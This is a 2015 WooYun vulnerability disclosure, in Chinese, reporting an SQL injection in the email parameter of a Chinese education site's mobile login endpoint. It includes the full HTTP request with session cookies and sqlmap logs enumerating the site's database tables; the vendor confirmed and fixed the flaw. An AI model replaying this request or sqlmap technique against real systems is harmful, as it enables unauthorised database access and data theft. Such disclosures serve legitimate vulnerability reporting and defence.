当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0146712

漏洞标题:好课网移动端登录接口存在SQL注入漏洞

相关厂商:好课网

漏洞作者: 三浪兄

提交时间:2015-10-14 16:20

修复时间:2015-10-15 10:38

公开时间:2015-10-15 10:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-14: 细节已通知厂商并且等待厂商处理中
2015-10-14: 厂商已经确认,细节仅向厂商公开
2015-10-15: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

为什么是走小厂,累觉不爱。

详细说明:

POST /user/login_ajax HTTP/1.1
Host: m.class.cn
Proxy-Connection: keep-alive
Content-Length: 44
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://m.class.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://m.class.cn/user/login
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,pl;q=0.4,zh-TW;q=0.2
Cookie: RESET_PASSWD_COOKIE=1852; PHPSESSID=n9gpssph9h8006aonjf27e2ju0; CNZZDATA5333700=cnzz_eid%3D1683793653-1444736309-null%26ntime%3D1444736309; Hm_lvt_5907fb81dedac17075ae6def57dc2989=1444738730,1444738958,1444738989,1444739041; Hm_lpvt_5907fb81dedac17075ae6def57dc2989=1444740248
email=admin%40123.com&passwd=admin&act=login


email参数可注入

漏洞证明:

屏幕快照 2015-10-14 下午1.28.39.png


[12:07:30] [INFO] fetching tables for database: 'bbsnew'
[12:07:30] [INFO] fetching number of tables for database 'bbsnew'
[12:07:30] [INFO] resumed: 151
[12:07:30] [INFO] resuming partial value: cd
[12:07:30] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[12:07:30] [WARNING] time-based comparison requires larger statistical model, please wait..............................                                                            
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[12:07:45] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
[12:07:56] [INFO] adjusting time delay to 1 second due to good response times
b_access
[12:08:24] [INFO] retrieved: cdb_activities
[12:09:07] [INFO] retrieved: cdb_activityapplies
[12:09:58] [INFO] retrieved: cdb_addons
[12:10:29] [INFO] retrieved: cdb_adminactions
[12:11:21] [INFO] retrieved: cdb_admincustom
[12:12:00] [INFO] retrieved: cdb_admingroups
[12:12:41] [INFO] retrieved: cdb_adminnotes
[12:13:16] [INFO] retrieved: cdb_adminsessions
[12:14:04] [INFO] retrieved: cdb_advertisements
[12:15:09] [INFO] retrieved: cdb_announcements
[12:16:17] [INFO] retrieved: cdb_attachmentf
[12:17:24] [ERROR] invalid character detected. retrying..
[12:17:24] [WARNING] increasing time delay to 2 seconds 
ields
[12:18:06] [INFO] retrieved: cdb_attachments
[12:18:45] [INFO] retrieved: cdb_attachpaymentlog
[12:20:44] [INFO] retrieved: cdb_attachtypes
[12:21:53] [INFO] retrieved: cdb_banned
[12:22:50] [INFO] retrieved: cdb_bbcodes
[12:23:51] [INFO] retrieved: cdb_caches
[12:24:45] [INFO] retrieved: cdb_chance
[12:25:38] [INFO] retrieved: cdb_creditslog
[12:27:11] [INFO] retrieved: cdb_crons
[12:27:56] [INFO] retrieved: cdb_debateposts
[12:29:43] [INFO] retrieved: cdb_debates
[12:30:13] [INFO] retrieved: cdb_dps_sign
[12:31:32] [INFO] retrieved: cdb_dps_signset
[12:32:25] [INFO] retrieved: cdb_failedlogins
[12:34:17] [INFO] retrieved: cdb_faqs
[12:34:46] [INFO] retrieved: cdb_favoritefor
[12:36:24] [INFO] adjusting time delay to 1 second due to good response times
ums
[12:36:38] [INFO] retrieved: cdb_favorites
[12:36:57] [INFO] retrieved: cdb_favoritethreads
[12:37:43] [INFO] retrieved: cdb_feeds
[12:38:06] [INFO] retrieved: cdb_forumfields
[12:38:59] [INFO] retrieved: cdb_forumlinks
[12:39:34] [INFO] retrieved: cdb_forumrecommend
[12:40:25] [INFO] retrieved: cdb_forums
[12:40:40] [INFO] retrieved: cdb_imagetypes
[12:41:30] [INFO] retrieved: cdb_invites
[12:42:05] [INFO] retrieved: cdb_itempool
[12:42:49] [INFO] retrieved: cdb_magiclog
[12:43:29] [INFO] retrieved: cdb_magicmarket
[12:44:05] [INFO] retrieved: cdb_magics
[12:44:20] [INFO] retrieved: cdb_medallog
[12:44:58] [INFO] retrieved: cdb_medals
[12:45:13] [INFO] retrieved: cdb_memberfields
[12:46:03] [INFO] retrieved: cdb_membermagics
[12:46:39] [INFO] retrieved: cdb_memberrecommend
[12:47:31] [INFO] retrieved: cdb_members
[12:47:47] [INFO] retrieved: cdb_membersbind
[12:48:18] [INFO] retrieved: cdb_memberspaces
[12:48:52] [INFO] retrieved: cdb_moderators
[12:49:39] [INFO] retrieved: cdb_modworks
[12:50:13] [INFO] retrieved: cdb_mytasks
[12:50:46] [INFO] retrieved: cdb_navs
[12:51:09] [INFO] retrieved: cdb_onlinelist
[12:52:03] [INFO] retrieved: cdb_onlinetime
[12:52:32] [INFO] retrieved: cdb_orders
[12:53:00] [INFO] retrieved: cdb_paymentlog
[12:53:55] [INFO] retrieved: cdb_pluginhooks
[12:54:51] [INFO] retrieved: cdb_plugins
[12:55:07] [INFO] retrieved: cdb_pluginvars
[12:55:36] [INFO] retrieved: cdb_polloptions
[12:56:37] [INFO] retrieved: cdb_polls
[12:56:52] [INFO] retrieved: cdb_postposition
[12:57:51] [INFO] retrieved: cdb_posts
[12:58:05] [INFO] retrieved: cdb_posts_bak121114
[12:58:50] [INFO] retrieved: cdb_prizer
[12:59:18] [INFO] retrieved: cdb_profilefields
[13:00:15] [INFO] retrieved: cdb_projects
[13:00:46] [INFO] retrieved: cdb_promotions
[13:01:30] [INFO] retrieved: cdb_prompt
[13:01:51] [INFO] retrieved: cdb_promptmsgs
[13:02:21] [INFO] retrieved: cdb_prompttype
[13:02:54] [INFO] retrieved: cdb_purchce
[13:03:25] [INFO] retrieved: cdb_ranks
[13:03:52] [INFO] retrieved: cdb_ratelog
[13:04:24] [INFO] retrieved: cdb_regips
[13:04:54] [INFO] retrieved: cdb_relatedthreads
[13:05:55] [INFO] retrieved: cdb_reportlog
[13:06:41] [INFO] retrieved: cdb_request
[13:07:11] [INFO] retrieved: cdb_rewardlog
[13:07:52] [INFO] retrieved: cdb_rsscaches
[13:08:31] [INFO] retrieved: cdb_searchindex
[13:09:26] [INFO] retrieved: cdb_sessions
[13:10:02] [INFO] retrieved: cdb_settings
[13:10:39] [INFO] retrieved: cdb_smilies
[13:11:10] [INFO] retrieved: cdb_spacecaches
[13:11:56] [INFO] retrieved: cdb_stats
[13:12:21] [INFO] retrieved: cdb_statvars
[13:12:47] [INFO] retrieved: cdb_styles
[13:13:13] [INFO] retrieved: cdb_stylevars
[13:13:41] [INFO] retrieved: cdb_tags
[13:14:03] [INFO] retrieved: ^C


屏幕快照 2015-10-14 下午3.47.55.png


修复方案:

过滤

版权声明:转载请注明来源 三浪兄@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-10-14 16:30

厂商回复:

多谢。

最新状态:

2015-10-15:已修复。